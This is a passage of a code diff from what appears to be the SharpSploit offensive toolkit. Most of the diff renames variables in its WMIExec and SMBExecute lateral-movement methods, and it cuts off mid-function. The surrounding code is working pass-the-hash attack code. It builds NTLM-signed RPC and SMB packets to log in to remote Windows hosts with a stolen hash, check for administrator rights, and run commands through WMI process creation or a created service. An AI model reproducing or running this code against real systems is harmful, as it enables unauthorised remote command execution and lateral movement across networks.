0x6e, 0x67, 0x73, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xf5, 0x03, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0xad, 0x03, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3a, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70 })
                                                             .Concat(new byte[501])
-                                                            .Concat(command_length)
+                                                            .Concat(Command_Length)
                                                             .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01 })
-                                                            .Concat(command_length2)
+                                                            .Concat(Command_Length2)
                                                             .Concat(new byte[] { 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00 })
-                                                            .Concat(command_bytes)
+                                                            .Concat(Command_Bytes)
                                                             .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
     
-                                                        if (stub_data.Length < request_split_index)
+                                                        if (Stub_Data.Length < Request_Split_Index)
                                                         {
-                                                            request_flags = new byte[] { 0x83 };
+                                                            Request_Flags = new byte[] { 0x83 };
                                                             WMI_client_stage_next = "Result";
                                                         }
                                                         else
                                                         {
-                                                            request_split = true;
-                                                            double request_split_stage_final = Math.Ceiling((double)stub_data.Length / request_split_index);
-                                                            if (request_split_stage < 2)
+                                                            Request_Split = true;
+                                                            double Request_Split_stage_final = Math.Ceiling((double)Stub_Data.Length / Request_Split_Index);
+                                                            if (Request_Split_Stage < 2)
                                                             {
-                                                                request_length = stub_data.Length;
-                                                                stub_data = Utilities.GetByteRange(stub_data, 0, request_split_index - 1);
-                                                                request_split_stage = 2;
-                                                                sequence_number_counter = 10;
-                                                                request_flags = new byte[] { 0x81 };
-                                                                request_split_index_tracker = request_split_index;
+                                                                Request_Length = Stub_Data.Length;
+                                                                Stub_Data = Utilities.GetByteRange(Stub_Data, 0, Request_Split_Index - 1);
+                                                                Request_Split_Stage = 2;
+                                                                Sequence_Number_Counter = 10;
+                                                                Request_Flags = new byte[] { 0x81 };
+                                                                Request_Split_Index_Tracker = Request_Split_Index;
                                                                 WMI_client_stage_next = "Request";
                                                             }
-                                                            else if (request_split_stage == request_split_stage_final)
+                                                            else if (Request_Split_Stage == Request_Split_stage_final)
                                                             {
-                                                                request_split = false;
-                                                                sequence_number = BitConverter.GetBytes(sequence_number_counter);
-                                                                request_split_stage = 0;
-                                                                stub_data = Utilities.GetByteRange(stub_data, request_split_index_tracker, stub_data.Length);
-                                                                request_flags = new byte[] { 0x82 };
+                                                                Request_Split = false;
+                                                                Sequence_Number = BitConverter.GetBytes(Sequence_Number_Counter);
+                                                                Request_Split_Stage = 0;
+                                                                Stub_Data = Utilities.GetByteRange(Stub_Data, Request_Split_Index_Tracker, Stub_Data.Length);
+                                                                Request_Flags = new byte[] { 0x82 };
                                                                 WMI_client_stage_next = "Result";
                                                             }
                                                             else
                                                             {
-                                                                request_length = stub_data.Length - request_split_index_tracker;
-                                                                stub_data = Utilities.GetByteRange(stub_data, request_split_index_tracker, request_split_index_tracker + request_split_index - 1);
-                                                                request_split_index_tracker += request_split_index;
-                                                                request_split_stage++;
-                                                                sequence_number = BitConverter.GetBytes(sequence_number_counter);
-                                                                sequence_number_counter++;
-                                                                request_flags = new byte[] { 0x80 };
+                                                                Request_Length = Stub_Data.Length - Request_Split_Index_Tracker;
+                                                                Stub_Data = Utilities.GetByteRange(Stub_Data, Request_Split_Index_Tracker, Request_Split_Index_Tracker + Request_Split_Index - 1);
+                                                                Request_Split_Index_Tracker += Request_Split_Index;
+                                                                Request_Split_Stage++;
+                                                                Sequence_Number = BitConverter.GetBytes(Sequence_Number_Counter);
+                                                                Sequence_Number_Counter++;
+                                                                Request_Flags = new byte[] { 0x80 };
                                                                 WMI_client_stage_next = "Request";
                                                             }
                                                         }
@@ -890,36 +879,36 @@ namespace SharpSploit.LateralMovement
                                                 }
                                                 break;
                                         }
-                                        packet_RPC = WMIExec.RPCRequest(request_flags, stub_data.Length, 16, request_auth_padding, request_call_ID, request_context_ID, request_opnum, request_UUID);
+                                        Packet_RPC = WMIExec.RPCRequest(Request_Flags, Stub_Data.Length, 16, Request_Auth_Padding, Request_Call_ID, Request_Context_ID, Request_Opnum, Request_UUID);
 
-                                        if (request_split)
+                                        if (Request_Split)
                                         {
-                                            packet_RPC["RPCRequest_AllocHint"] = BitConverter.GetBytes(request_length);
+                                            Packet_RPC["RPCRequest_AllocHint"] = BitConverter.GetBytes(Request_Length);
                                         }
 
-                                        packet_NTLMSSP_verifier = WMIExec.NTLMSSPVerifier(request_auth_padding, new byte[] { 0x04 }, sequence_number);
-                                        NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
-                                        RPC_Sign = sequence_number.Concat(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC))
-                                            .Concat(stub_data)
-                                            .Concat(Utilities.GetByteRange(NTLMSSP_verifier, 0, request_auth_padding + 7)).ToArray();
+                                        Packet_NTLMSSP_Verifier = WMIExec.NTLMSSPVerifier(Request_Auth_Padding, new byte[] { 0x04 }, Sequence_Number);
+                                        NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier);
+                                        RPC_Sign = Sequence_Number.Concat(Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC))
+                                            .Concat(Stub_Data)
+                                            .Concat(Utilities.GetByteRange(NTLMSSP_Verifier, 0, Request_Auth_Padding + 7)).ToArray();
 
-                                        RPC_signature = HMAC_MD5.ComputeHash(RPC_Sign);
-                                        RPC_signature = Utilities.GetByteRange(RPC_signature, 0, 7);
-                                        packet_NTLMSSP_verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_signature;
-                                        NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
+                                        RPC_Signature = HMAC_MD5.ComputeHash(RPC_Sign);
+                                        RPC_Signature = Utilities.GetByteRange(RPC_Signature, 0, 7);
+                                        Packet_NTLMSSP_Verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_Signature;
+                                        NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier);
 
-                                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC).Concat(stub_data).Concat(NTLMSSP_verifier).ToArray();
-                                        WMI_client_random_port_stream.Write(WMI_client_send, 0, WMI_client_send.Length);
-                                        WMI_client_random_port_stream.Flush();
+                                        WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC).Concat(Stub_Data).Concat(NTLMSSP_Verifier).ToArray();
+                                        WMI_Client_Random_Port_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length);
+                                        WMI_Client_Random_Port_Stream.Flush();
 
-                                        if (!request_split)
+                                        if (!Request_Split)
                                         {
-                                            WMI_client_random_port_stream.Read(WMI_client_receive, 0, WMI_client_receive.Length);
+                                            WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length);
                                         }
 
-                                        while (WMI_client_random_port_stream.DataAvailable)
+                                        while (WMI_Client_Random_Port_Stream.DataAvailable)
                                         {
-                                            WMI_client_random_port_stream.Read(WMI_client_receive, 0, WMI_client_receive.Length);
+                                            WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length);
                                             Thread.Sleep(10);
                                         }
                                         WMI_client_stage = WMI_client_stage_next;
@@ -927,15 +916,15 @@ namespace SharpSploit.LateralMovement
                                     break;
                                 case "Result":
                                     {
-                                        while (WMI_client_random_port_stream.DataAvailable)
+                                        while (WMI_Client_Random_Port_Stream.DataAvailable)
                                         {
-                                            WMI_client_random_port_stream.Read(WMI_client_receive, 0, WMI_client_receive.Length);
+                                            WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length);
                                             Thread.Sleep(10);
                                         }
 
-                                        if (WMI_client_receive[1145] != 9)
+                                        if (WMI_Client_Receive[1145] != 9)
                                         {
-                                            target_process_id = Utilities.DataLength(1141, WMI_client_receive);
+                                            Target_Process_ID = Utilities.DataLength(1141, WMI_Client_Receive);
                                             success = true;
                                         }
 
@@ -945,16 +934,16 @@ namespace SharpSploit.LateralMovement
                             }
                             Thread.Sleep(10);
                         }
-                        WMI_client_random_port.Close();
-                        WMI_client_random_port_stream.Close();
+                        WMI_Client_Random_Port.Close();
+                        WMI_Client_Random_Port_Stream.Close();
                     }
                 }
-                WMI_client.Close();
-                WMI_client_stream.Close();
+                WMI_Client.Close();
+                WMI_Client_Stream.Close();
             }
             if (success)
             {
-                output.AppendLine(String.Format("Command executed with process ID {0} on {1}", target_process_id, target_long));
+                output.AppendLine(String.Format("Command executed with process ID {0} on {1}", Target_Process_ID, Target_Long));
             }
             else
             {
@@ -965,21 +954,21 @@ namespace SharpSploit.LateralMovement
 
 
         /// <summary>
-        /// Determines if a username and hash has administrative privilege on a target
+        /// Determines if a username and hash has administrative privilege on a Target
         /// </summary>
         /// <param name="username">The Username to query.</param>
         /// <param name="hash">The NTLM hash for the user</param>
         /// <param name="domain">The logon domain for the user</param>
-        /// <param name="target">The target to query.</param>
+        /// <param name="Target">The Target to query.</param>
         /// <returns>True for Admin, False for not.</returns>
         /// <author>Scottie Austin (@checkymander)</author>
         /// <remarks>
         /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
         /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
         /// </remarks>
-        public static bool SMBAdminCheck(string username, string hash, string domain, string target)
+        public static bool SMBAdminCheck(string username, string hash, string domain, string Target)
         {
-            string result = SMBExecute(username, hash, domain, target, AdminCheck: true);
+            string result = SMBExecute(username, hash, domain, Target, AdminCheck: true);
             if (result.Contains(" is a local administrator on "))
                 return true;
             else
@@ -993,8 +982,8 @@ namespace SharpSploit.LateralMovement
         /// <param name="username">The username to log on as.</param>
         /// <param name="hash">The NTLM hash for the user.</param>
         /// <param name="domain">The logon domain for the user.</param>
-        /// <param name="targets">The target computers to run the command on.</param>
-        /// <param name="command">The Command to execute on the target</param>
+        /// <param name="targets">The Target computers to run the command on.</param>
+        /// <param name="command">The Command to execute on the Target</param>
         /// <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
         /// <param name="ServiceName">The name to give the SMB service for execution.</param>
         /// <param name="AdminCheck">Check only if user is Admin on targets.</param>
@@ -1010,9 +999,9 @@ namespace SharpSploit.LateralMovement
         public static string SMBExecute(string username, string hash, string domain, List<string> targets, string command = "", int sleep = 15, string ServiceName = "", bool AdminCheck = false, bool ComSpec = true, bool ForceSMB1 = false, bool debug = false)
         {
             StringBuilder sb = new StringBuilder();
-            foreach (var target in targets)
+            foreach (var Target in targets)
             {
-                sb.AppendLine(SMBExecute(username, hash, domain, target, command, sleep, ServiceName, AdminCheck, ComSpec, ForceSMB1, debug));
+                sb.AppendLine(SMBExecute(username, hash, domain, Target, command, sleep, ServiceName, AdminCheck, ComSpec, ForceSMB1, debug));
             }
 
             return sb.ToString();
@@ -1023,8 +1012,8 @@ namespace SharpSploit.LateralMovement
         /// <param name="username">The username to log on as.</param>
         /// <param name="hash">The NTLM hash for the user.</param>
         /// <param name="domain">The logon domain for the user.</param>
-        /// <param name="target">The target computer to run the command on.</param>
-        /// <param name="command">The Command to execute on the target</param>
+        /// <param name="Target">The Target computer to run the command on.</param>
+        /// <param name="command">The Command to execute on the Target</param>
         /// <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
         /// <param name="ServiceName">The name to give the SMB service for execution.</param>
         /// <param name="AdminCheck">Check only if user is Admin on targets.</param>
@@ -1037,48 +1026,65 @@ namespace SharpSploit.LateralMovement
         /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
         /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
         /// </remarks>
-        public static string SMBExecute(string username, string hash, string domain, string target, string command = "", int sleep = 15, string ServiceName = "", bool AdminCheck = false, bool ComSpec = true, bool ForceSMB1 = false, bool debug = false)
+        public static string SMBExecute(string username, string hash, string domain, string Target, string command = "", int sleep = 15, string ServiceName = "", bool AdminCheck = false, bool ComSpec = true, bool ForceSMB1 = false, bool debug = false)
         {
-            bool debugging = true;
-
             //Trackers
-            bool login_successful = false;
-            bool service_deleted = false;
-            bool SMBExec_failed = false;
+            bool Login_Successful = false;
+            bool Service_Deleted = false;
+            bool SMBExec_Failed = false;
             bool SMB_execute = false;
-            bool SMB_signing = false;
-            string output_username;
+            bool SMB_Signing = false;
+            string Output_Username;
             string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-", "");
             string[] processID2 = processID.Split('-');
             StringBuilder output = new StringBuilder();
-            string stage_current = "";
-            string stage = "";
-            int SMB2_message_ID = 0;
-            int SMB_close_service_handle_stage = 0;
-            int SMB_split_stage = 0;
-            int SMB_split_index_tracker = 0;
-            double SMB_split_stage_final = 0;
+            int SMB2_Message_ID = 0;
+            int SMB_Close_Service_Handle_Stage = 0;
+            int SMB_Split_Stage = 0;
+            int SMB_Split_Index_Tracker = 0;
+            double SMB_Split_Stage_final = 0;
             //Communication
             byte[] SMBClientReceive = null;
             //Packet Reqs
-            byte[] process_ID_Bytes = Utilities.ConvertStringToByteArray(processID.ToString());
-            byte[] SMB_session_ID = null;
-            byte[] session_key = null;
-            byte[] SMB_session_key_length = null;
-            byte[] SMB_negotiate_flags = null;
-            byte[] SMB2_tree_ID = null;
-            byte[] SMB_client_send = null;
+            byte[] Process_ID_Bytes = Utilities.ConvertStringToByteArray(processID.ToString());
+            byte[] SMB_Session_ID = null;
+            byte[] Session_Key = null;
+            byte[] SMB_Session_Key_Length = null;
+            byte[] SMB_Negotiate_Flags = null;
+            byte[] SMB2_Tree_ID = null;
+            byte[] SMB_Client_Send = null;
             byte[] SMB_FID = new byte[2];
-            byte[] SMB_service_manager_context_handle = null;
-            byte[] SCM_data = null;
-            byte[] SMB_service_context_handle = null;
-            byte[] SMB_named_pipe_bytes = null;
-            byte[] SMB_file_ID = null;
-            byte[] SMB_user_ID = null;
-            OrderedDictionary packet_SMB_header = null;
-            OrderedDictionary packet_SMB2_header = null;
+            byte[] SMB_Service_Manager_Context_Handle = null;
+            byte[] SMB_Service_Context_Handle = null;
+            byte[] SMB_Named_Pipe_Bytes = null;
+            byte[] SMB_File_ID = null;
+            byte[] SMB_User_ID = null;
+            byte[] SMB_Header = null;
+            byte[] SMB2_Header = null;
+            byte[] SMB_Data = null;
+            byte[] SMB2_Data = null;
+            byte[] NetBIOS_Session_Service = null;
+            byte[] NTLMSSP_Negotiate = null;
+            byte[] NTLMSSP_Auth = null;
+            byte[] SMB_Sign = null;
+            byte[] SMB_Signature = null;
+            byte[] SMB_Signature2 = null;
+            byte[] SMB2_Sign = null;
+            byte[] SMB2_Signature = null;
+            byte[] SMB_Signing_Sequence = null;
+            byte[] RPC_Data = null;
+            byte[] SCM_Data = null;
+            OrderedDictionary Packet_SMB_Header = null;
+            OrderedDictionary Packet_SMB2_Header = null;
+            OrderedDictionary Packet_SMB_Data = null;
+            OrderedDictionary Packet_SMB2_Data = null;
+            OrderedDictionary Packet_NTLMSSP_Negotiate = null;
+            OrderedDictionary Packet_NTLMSSP_Auth = null;
+            OrderedDictionary Packet_RPC_Data = null;
+            OrderedDictionary Packet_SCM_Data = null;
+            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
 
-            if (String.IsNullOrEmpty(username) || String.IsNullOrEmpty(hash) || String.IsNullOrEmpty(target))
+            if (String.IsNullOrEmpty(username) || String.IsNullOrEmpty(hash) || String.IsNullOrEmpty(Target))
             {
                 output.AppendLine("Missing Required Params");
             }
@@ -1088,9 +1094,9 @@ namespace SharpSploit.LateralMovement
                     hash = hash.Split(':').Last();
             }
             if (!string.IsNullOrEmpty(domain))
-                output_username = domain + '\\' + username;
+                Output_Username = domain + '\\' + username;
             else
-                output_username = username;
+                Output_Username = username;
 
 
             if (!AdminCheck)
@@ -1108,16 +1114,16 @@ namespace SharpSploit.LateralMovement
 
             try
             {
-                SMBClient.Connect(target, 445);
+                SMBClient.Connect(Target, 445);
             }
-            catch (Exception e)
+            catch
             {
-                output.AppendLine("Could not connect to target");
+                output.AppendLine("Could not connect to Target");
             }
 
             if (SMBClient.Connected)
             {
-                if (debug) { output.AppendLine(String.Format("Connected to {0}", target)); }
+                if (debug) { output.AppendLine(String.Format("Connected to {0}", Target)); }
                 NetworkStream SMBClientStream = SMBClient.GetStream();
                 SMBClientReceive = new byte[1024];
                 string SMBClientStage = "NegotiateSMB";
@@ -1129,15 +1135,15 @@ namespace SharpSploit.LateralMovement
                     {
                         case "NegotiateSMB":
                             {
-                                packet_SMB_header = new OrderedDictionary();
-                                packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x72 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, process_ID_Bytes, new byte[] { 0x00, 0x00 });
-                                OrderedDictionary packet_SMB_data = SMBExec.SMBNegotiateProtocolRequest(ForceSMB1);
-                                byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                                byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                Packet_SMB_Header = new OrderedDictionary();
+                                Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x72 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
+                                Packet_SMB_Data = SMBExec.SMBNegotiateProtocolRequest(ForceSMB1);
+                                SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
+
+                                SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                 if (BitConverter.ToString(new byte[] { SMBClientReceive[4], SMBClientReceive[5], SMBClientReceive[6], SMBClientReceive[7] }).ToLower() == "ff-53-4d-42")
                                 {
                                     ForceSMB1 = true;
@@ -1147,17 +1153,17 @@ namespace SharpSploit.LateralMovement
                                     if (BitConverter.ToString(new byte[] { SMBClientReceive[39] }).ToLower() == "0f")
                                     {
                                         if (debug) { output.AppendLine("SMB Signing is Enabled"); }
-                                        SMB_signing = true;
-                                        SMB_session_key_length = new byte[] { 0x00, 0x00 };
-                                        SMB_negotiate_flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
+                                        SMB_Signing = true;
+                                        SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
+                                        SMB_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
 
                                     }
                                     else
                                     {
                                         if (debug) { output.AppendLine("SMB Signing is not Enforced"); }
-                                        SMB_signing = false;
-                                        SMB_session_key_length = new byte[] { 0x00, 0x00 };
-                                        SMB_negotiate_flags = new byte[] { 0x05, 0x82, 0x08, 0xa0 };
+                                        SMB_Signing = false;
+                                        SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
+                                        SMB_Negotiate_Flags = new byte[] { 0x05, 0x82, 0x08, 0xa0 };
 
                                     }
                                 }
@@ -1168,215 +1174,212 @@ namespace SharpSploit.LateralMovement
                                     if (BitConverter.ToString(new byte[] { SMBClientReceive[70] }) == "03")
                                     {
                                         if (debug) { output.AppendLine("SMB Signing is Enabled"); }
-                                        SMB_signing = true;
-                                        SMB_session_key_length = new byte[] { 0x00, 0x00 };
-                                        SMB_negotiate_flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
+                                        SMB_Signing = true;
+                                        SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
+                                        SMB_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
                                     }
                                     else
                                     {
                                         if (debug) { output.AppendLine("SMB Signing is not Enforced"); }
-                                        SMB_signing = false;
-                                        SMB_session_key_length = new byte[] { 0x00, 0x00 };
-                                        SMB_negotiate_flags = new byte[] { 0x05, 0x80, 0x08, 0xa0 };
+                                        SMB_Signing = false;
+                                        SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
+                                        SMB_Negotiate_Flags = new byte[] { 0x05, 0x80, 0x08, 0xa0 };
                                     }
                                 }
                             }
                             break;
                         case "NegotiateSMB2":
                             {
-                                SMB2_message_ID = 1;
-                                packet_SMB2_header = new OrderedDictionary();
-                                SMB2_tree_ID = new byte[] { 0x00, 0x00, 0x00, 0x00 };
-                                SMB_session_ID = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
-                                packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x00, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                OrderedDictionary packet_SMB2_data = SMBExec.SMB2NegotiateProtocolRequest();
-                                byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                                byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
-                                SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                SMB2_Message_ID = 1;
+                                Packet_SMB2_Header = new OrderedDictionary();
+                                SMB2_Tree_ID = new byte[] { 0x00, 0x00, 0x00, 0x00 };
+                                SMB_Session_ID = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+                                Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x00, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                Packet_SMB2_Data = SMBExec.SMB2NegotiateProtocolRequest();
+                                SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                                SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
+                                SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                 SMBClientStage = "NTLMSSPNegotiate";
 
                             }
                             break;
                         case "NTLMSSPNegotiate":
                             {
-                                SMB_client_send = null;
+                                SMB_Client_Send = null;
                                 if (ForceSMB1)
                                 {
-                                    packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, process_ID_Bytes, new byte[] { 0x00, 0x00 });
+                                    Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
 
-                                    if (SMB_signing)
+                                    if (SMB_Signing)
                                     {
-                                        packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                        Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                     }
-                                    OrderedDictionary packet_NTLMSSP_negotiate = SMBExec.NTLMSSPNegotiate(SMB_negotiate_flags, null);
-                                    byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                    byte[] NTLMSSP_negotiate = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_negotiate);
-                                    OrderedDictionary packet_SMB_data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_negotiate);
-                                    byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                    OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                                    byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                    SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
+                                    Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null);
+                                    SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                    NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
+                                    Packet_SMB_Data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_Negotiate);
+                                    SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                    NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
+
+                                    SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
                                 }
                                 else
                                 {
-                                    packet_SMB2_header = new OrderedDictionary();
-                                    SMB2_message_ID += 1;
-                                    packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                    OrderedDictionary packet_NTLMSSP_negotiate = SMBExec.NTLMSSPNegotiate(SMB_negotiate_flags, null); //need to see if packet_version works? Maybe this is just left over?
-                                    byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                    byte[] NTLMSSP_negotiate = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_negotiate);
-                                    OrderedDictionary packet_SMB2_data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_negotiate);
-                                    byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                    OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                                    byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                    SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
+                                    Packet_SMB2_Header = new OrderedDictionary();
+                                    SMB2_Message_ID += 1;
+                                    Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                    Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null); //need to see if Packet_version works? Maybe this is just left over?
+                                    SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                    NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
+                                    Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Negotiate);
